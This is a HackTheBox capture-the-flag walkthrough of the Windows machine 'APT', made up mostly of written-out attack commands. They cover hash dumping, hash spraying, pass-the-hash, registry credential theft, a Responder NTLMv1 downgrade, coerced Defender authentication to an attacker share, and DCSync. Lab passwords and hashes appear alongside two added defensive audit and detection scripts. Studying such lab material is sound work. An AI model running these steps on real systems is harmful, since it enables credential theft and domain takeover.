HTB - APT

In this walkthrough, we will be going through the APT machine from HackTheBox. It is rated Insane on the platform and involves RPC enumeration that leads to an IPv6 address, exploiting registry values to get initial access, and leveraging NTLMv1 hash authentication for privilege escalation. So, let's get started without any delay.

Machine Info:

Title: APT
IP address: 10.10.10.213
Difficulty: Insane
OS: Windows
Description: APT is an insane difficulty Windows machine where only the RPC and HTTP services are exposed. Enumeration of the IPv6 address gives us access to the backup share. User enumeration and brute-force attacks give us access to the registry, which contains login credentials, and NTLMv1 hashes are used to gain privileged access.

Enumeration:

  • I started with my regular aggressive nmap scan and found only two open ports: 80 (HTTP) and 135 (RPC).

$ sudo nmap -A 10.10.10.213
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2023-12-30 08:49 IST

Nmap scan report for 10.10.10.213
Host is up (0.20s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE VERSION
80/tcp  open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Gigantic Hosting | Home
135/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607
Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 (85%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   199.63 ms 10.10.14.1
2   200.31 ms 10.10.10.213

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.87 seconds

nmap scan

  • Enumerated the web server on port 80 but found nothing interesting.

Gigantic Hosting

RPC Enumeration:

  • Next, I used rpcmap.py to list the interfaces exposed by DCOM. The three UUIDs obtained correspond to IID_IRemoteSCMActivator, IID_IActivation and IID_IObjectExporter respectively.

rpcmap.py 'ncacn_ip_tcp:10.10.10.213' | grep -A2 'DCOM'

rpcmap.py output

  • Moving on, I brute-forced the opnum values on the DCOM interface found and got successful hits for opnums 3 and 5.

rpcmap.py 'ncacn_ip_tcp:10.10.10.213' -brute-opnums -auth-level 1 -opnum-max 5

Opnum value bruteforce

  • According to the documentation, these methods are ServerAlive (opnum 3) and ServerAlive2 (opnum 5) of IObjectExporter; they return the server's network address bindings to the client so that it can connect further.

# serveralive.py - query the DCOM OXID resolver (IObjectExporter) without credentials
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_NONE
from impacket.dcerpc.v5.dcomrt import IObjectExporter

# Raw TCP binding to the RPC endpoint on port 135
target = 'ncacn_ip_tcp:10.10.10.213'
rpcTransport = transport.DCERPCTransportFactory(target)

# No authentication is required for this interface
portmap = rpcTransport.get_dce_rpc()
portmap.set_auth_level(RPC_C_AUTHN_LEVEL_NONE)
portmap.connect()

obj = IObjectExporter(portmap)

# ServerAlive2 (opnum 5) returns the server's string bindings, i.e. every
# address the DCOM runtime listens on, IPv6 addresses included
bindings = obj.ServerAlive2()

for binding in bindings:
    addr = binding['aNetworkAddr']
    print(f"Address: {addr}")

  • With the help of the above script we got an interesting result: the target also has an IPv6 address.

python3 serveralive.py

serveralive.py result

  • Added the IP address to our /etc/hosts file.

sudo nano /etc/hosts

adding hostname

IPV6 Enumeration:

  • Next, I enumerated the IPv6 address and the services running on it using nmap. Judging by the open ports, a Windows AD environment is running on the target.

nmap -6 -p- dead:beef::b885:d62a:d679:573f

IPv6 nmap scan

  • Further enumerated the open ports and services running on them.

nmap -6 -A -p 80,88,135,389,445,464,593,636,3268,3269,5985,9389,47001 dead:beef::b885:d62a:d679:573f

IPV6 aggressive scan

  • Checked the SMB shares on the IPv6 address and found one called backup. Logged in with a null session and downloaded the backup.zip file stored there.

smbclient //dead:beef::b885:d62a:d679:573f/backup

SMB Enumeration

Cracking ZIP password:

  • The zip file was password protected, so I used john to crack its password and succeeded.

zip2john backup.zip > hash
sudo john hash -w=/opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt --fork=4

Zip2john

cracking via john

  • Using the cracked password, extracted the contents of the zip file. It is a backup of the NTDS database (ntds.dit) along with the SYSTEM and SECURITY registry hives.

unzip backup.zip

  • Using secretsdump.py, dumped the hashes offline from the SYSTEM hive and the NTDS.dit file.

secretsdump.py local -system registry/SYSTEM -security registry/SECURITY -ntds Active\ Directory/ntds.dit -outputfile hashes

Dumping hashes

  • First, extracted the usernames from the above result and added the domain name htb.local to my /etc/hosts file.

cut -d ':' -f 1 hashes.ntds > usernames.txt

usernames

adding hostname

  • Next, performed user enumeration against the target with kerbrute to find which of the dumped usernames are still valid. The user henry.vinson got a positive hit, which makes him an area of interest for us.

kerbrute userenum -d htb.local --dc apt usernames.txt

kerbrute output

  • Checked the password hashes for user henry in the secretsdump.py result and got a couple of them.

grep henry hashes.ntds

user henry hash

  • Next, tried to authenticate as henry.vinson by passing the hash, but got nothing back.

cme smb apt -u henry.vinson -H 2de80758521541d19cabba480b260e8f

spraying the hash

  • So, I sprayed all the hashes from the dumped hashes file against the account and, surprisingly, got a green flag on one of them.

cme smb htb.local -u henry.vinson -H hashes.txt

spraying the hashes again

got success
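The spray above worked because a hash taken from a different entry in the dump matched henry.vinson's current password. The same reuse is visible offline, which is what a defender auditing an NTDS backup should look for. The script below is an added example, not code from the original write-up: it parses secretsdump's hashes.ntds line format, skips password-history entries, and reports NT hashes shared by more than one account as well as accounts with an empty password. The SAMPLE dump is constructed and its hashes are placeholders; only the empty-password NT hash (31d6cfe0d16ae931b73c59d7e0c089c0) is a real, well-known constant.

```python
# Added example (not from the original write-up): audit a secretsdump-style
# hashes.ntds file for password reuse. Each line has secretsdump's format
#   domain\user:rid:lm_hash:nt_hash:::
# The SAMPLE dump below is constructed; none of its hashes come from the box.
import re
import sys
from collections import defaultdict

# NT hash of the empty password (MD4 of the empty string), a well-known constant
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

NTDS_LINE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)
HISTORY_SUFFIX = re.compile(r"_history\d+$")


def parse_ntds(text):
    """Return (user, rid, nt_hash) for every current-password line in the dump.

    Password-history entries (user_history0, ...) and non-NTLM lines such as
    Kerberos keys are skipped.
    """
    records = []
    for line in text.splitlines():
        m = NTDS_LINE.match(line.strip())
        if not m or HISTORY_SUFFIX.search(m.group("user")):
            continue
        records.append((m.group("user"), int(m.group("rid")), m.group("nt").lower()))
    return records


def find_shared_hashes(records):
    """Map each NT hash used by two or more accounts to the accounts sharing it."""
    by_hash = defaultdict(list)
    for user, _rid, nt in records:
        by_hash[nt].append(user)
    return {nt: users for nt, users in by_hash.items() if len(users) > 1}


def find_empty_passwords(records):
    """Accounts whose NT hash is the hash of the empty password."""
    return [user for user, _rid, nt in records if nt == EMPTY_NT_HASH]


# Constructed sample in secretsdump's output format (hashes are placeholders)
SAMPLE = """\
htb.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:::
htb.local\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\\svc_backup:1104:aad3b435b51404eeaad3b435b51404ee:bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb:::
htb.local\\henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb:::
htb.local\\svc_backup_history0:1104:aad3b435b51404eeaad3b435b51404ee:cccccccccccccccccccccccccccccccc:::
"""


def main():
    # Pass a real hashes.ntds path as the first argument to audit it instead
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    records = parse_ntds(text)
    print(f"{len(records)} accounts parsed")
    for nt, users in find_shared_hashes(records).items():
        print(f"shared NT hash {nt}: {', '.join(users)}")
    for user in find_empty_passwords(records):
        print(f"empty password: {user}")


if __name__ == "__main__":
    main()
```

Run it with no arguments to see the report for the constructed sample, or with the path of a hashes.ntds file produced by secretsdump. Shared hashes between a service account and a user account are the usual sign of a reused password, which is exactly the condition that let the spray succeed here.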

  • Confirmed the positive hit with cme, then tried a pass-the-hash login over WinRM to get a shell as user henry.vinson, but was unable to do so.

cme smb apt -u henry.vinson -H e53d87d42adaa3ca32bdb34a876cbffb

confirming the positive

unable to get shell

Initial Access:

  • When a user logs in, their registry hive is mounted at HKCU, which is unique to each user. The same hives can also be reached through the HKEY_USERS (HKU) hive, which holds the registry entries of every loaded user profile on the system. Impacket's reg.py talks to the Remote Registry service, so a valid domain account is enough to query it remotely.

reg.py -hashes :e53d87d42adaa3ca32bdb34a876cbffb htb.local/henry.vinson@apt query -keyName HKU

reg.py output

  • The query is successful and we’re able to list the subkeys in HKU. One interesting place to look for sensitive information is also the Software subkey. It’s used to store configuration and settings for various applications and might contain credentials.

reg.py -hashes :e53d87d42adaa3ca32bdb34a876cbffb htb.local/henry.vinson@apt query -keyName HKU\\Software

enumerating registries

  • We notice an interesting key named GiganticHostingManagementSystem, and checking its contents reveals the password for user henry.vinson_adm.

reg.py -hashes :e53d87d42adaa3ca32bdb34a876cbffb htb.local/henry.vinson@apt query -keyName HKU\\Software\\GiganticHostingManagementSystem

getting the password

  • Using the found username and password combination, got my initial access and captured the user flag.

evil-winrm -i apt -u henry.vinson_adm -p G1#Ny5@2dvht

getting the shell via evilwin-rm

user flag

Privilege Escalation:

  • After post-compromise enumeration, I found that the Windows Defender installed on the box can be told to scan a file on a share we host, which makes the machine authenticate to that share; Responder captures the resulting hash. Since these binaries run as SYSTEM, the captured hash belongs to the machine account, and cracking it gives us administrator-level access. Before performing the attack, however, set the challenge to the number below in the Responder config file; together with the --lm option this downgrades the captured response to NetNTLMv1 against a known static challenge, so that it can be cracked easily.

# Custom challenge value in the Responder config file

Challenge = 1122334455667788

# Editing the Responder config file

sudo nano /etc/Responder.conf

Responder Custom challenge

  • Set up responder for our attack.

sudo responder -I tun0 --lm

Setting up responder

  • Used the command below to make Windows Defender scan a file on our fake share and got an immediate response in the Responder output.

.\MpCmdRun.exe -Scan -ScanType 3 -File \\10.10.14.5\share\file.txt

scan the file

capturing the hash

  • Cracked the captured NetNTLMv1 hash using the online service below.

Cracking website: https://crack.sh/

APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788

crack the hash

APT$:d167c3238864b12f5f82feae86a7f798
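The reason this crack is cheap is the combination of NetNTLMv1 and a fixed server challenge, both of which a defender can detect from the artefacts involved. The script below is an added example and not part of the original write-up: it classifies a Responder/hashcat-style capture line as NetNTLMv1 or NetNTLMv2 and flags the static challenge 1122334455667788 and machine-account responses, and it filters Windows Security event 4624 records for logons whose "Package Name (NTLM only)" field (LmPackageName) is NTLM V1 or LM. CAPTURE_V1 is the line captured above; CAPTURE_V2 and the 4624 records in SAMPLE_EVENTS are constructed to show the shapes being matched, using the event's real EventData field names.

```python
# Added example (not part of the original write-up): detection logic for the
# NTLMv1 downgrade used above. Two things a defender can check are shown:
#   1. a Responder/hashcat-style capture line, to tell NetNTLMv1 from NetNTLMv2
#      and to flag the well-known static challenge 1122334455667788;
#   2. Windows Security event 4624 fields, where "Package Name (NTLM only)"
#      (LmPackageName) equal to "NTLM V1" or "LM" shows that a host accepted
#      a downgraded NTLM logon.
# CAPTURE_V1 is the line from the write-up; CAPTURE_V2 and SAMPLE_EVENTS are
# constructed to show the shapes being matched.
import re

STATIC_CHALLENGE = "1122334455667788"
HEX = r"[0-9a-fA-F]"

# NetNTLMv1: user::domain:lm_response(48 hex):nt_response(48 hex):challenge(16 hex)
NETNTLMV1 = re.compile(
    rf"^(?P<user>[^:]+)::(?P<domain>[^:]*):(?P<lm>{HEX}{{48}}):"
    rf"(?P<nt>{HEX}{{48}}):(?P<chal>{HEX}{{16}})$"
)
# NetNTLMv2: user::domain:challenge(16 hex):nt_proof(32 hex):blob(hex, variable)
NETNTLMV2 = re.compile(
    rf"^(?P<user>[^:]+)::(?P<domain>[^:]*):(?P<chal>{HEX}{{16}}):"
    rf"(?P<proof>{HEX}{{32}}):(?P<blob>{HEX}+)$"
)


def classify_capture(line):
    """Describe a captured NTLM response: version, user and risk flags."""
    line = line.strip()
    m = NETNTLMV1.match(line)
    if m:
        flags = []
        if m.group("chal").lower() == STATIC_CHALLENGE:
            # fixed challenge: the response maps back to the NT hash, as crack.sh showed above
            flags.append("static_challenge")
        if m.group("user").endswith("$"):
            # machine account: a coerced host authentication, as with MpCmdRun here
            flags.append("machine_account")
        return {"version": "NetNTLMv1", "user": m.group("user"), "flags": flags}
    m = NETNTLMV2.match(line)
    if m:
        return {"version": "NetNTLMv2", "user": m.group("user"), "flags": []}
    return {"version": "unknown", "user": None, "flags": ["unparsed"]}


def flag_ntlm_v1_logons(events):
    """Return 4624 events whose NTLM package name shows an NTLMv1 or LM logon."""
    return [
        ev for ev in events
        if ev.get("EventID") == 4624
        and ev.get("AuthenticationPackageName") == "NTLM"
        and ev.get("LmPackageName", "").upper() in ("NTLM V1", "LM")
    ]


# The NetNTLMv1 response captured in the write-up
CAPTURE_V1 = ("APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:"
              "95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788")
# Constructed NetNTLMv2 line in the same capture format (values are placeholders)
CAPTURE_V2 = ("henry.vinson_adm::HTB:0102030405060708:" + "a" * 32 + ":"
              + "0101000000000000" + "b" * 64)
# Constructed 4624 records using the event's EventData field names
SAMPLE_EVENTS = [
    {"EventID": 4624, "TargetUserName": "APT$", "LogonType": 3, "IpAddress": "10.10.14.5",
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V1"},
    {"EventID": 4624, "TargetUserName": "henry.vinson_adm", "LogonType": 3, "IpAddress": "10.10.14.5",
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2"},
    {"EventID": 4624, "TargetUserName": "henry.vinson_adm", "LogonType": 3, "IpAddress": "::1",
     "AuthenticationPackageName": "Kerberos", "LmPackageName": "-"},
]

if __name__ == "__main__":
    for line in (CAPTURE_V1, CAPTURE_V2):
        print(classify_capture(line))
    for ev in flag_ntlm_v1_logons(SAMPLE_EVENTS):
        print(f"NTLMv1 logon: {ev['TargetUserName']} from {ev['IpAddress']}")
```

Which NTLM flavours a host will send and accept is set by the "Network security: LAN Manager authentication level" policy (LmCompatibilityLevel). At level 5 the host sends NTLMv2 only and refuses LM and NTLM, so Responder's --lm downgrade has nothing to downgrade; the "Network security: Restrict NTLM: Audit NTLM authentication in this domain" policy additionally records NTLM use in the NTLM Operational log for the kind of review the second function performs.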

  • With the recovered machine account hash, we performed a DCSync attack using secretsdump.py and got the Administrator user's hash.

secretsdump.py 'htb.local/APT$@apt' -hashes :d167c3238864b12f5f82feae86a7f798 -just-dc-user administrator

secretsdump.py output

  • Performed a pass-the-hash attack using evil-winrm to get a shell as user Administrator and captured the root flag.

evil-winrm -i apt -u Administrator -H c370bddf384a691d811ff3495e8a72e2

getting root

root flag

machine completed

Conclusion:

So that was "APT" for you. This machine covers enumeration of the exposed RPC interfaces, which provide an interesting object that can be used to disclose the IPv6 address. The box turned out to be protected by a firewall whose IPv6 exemption gives access to a backup share. User enumeration and brute-force attacks gave us access to the registry, which contains login credentials. The machine was configured to allow authentication via the NTLMv1 protocol, which was then leveraged to gain system access. On that note, I will take your leave and meet you in the next one. Till then, "Happy hacking".
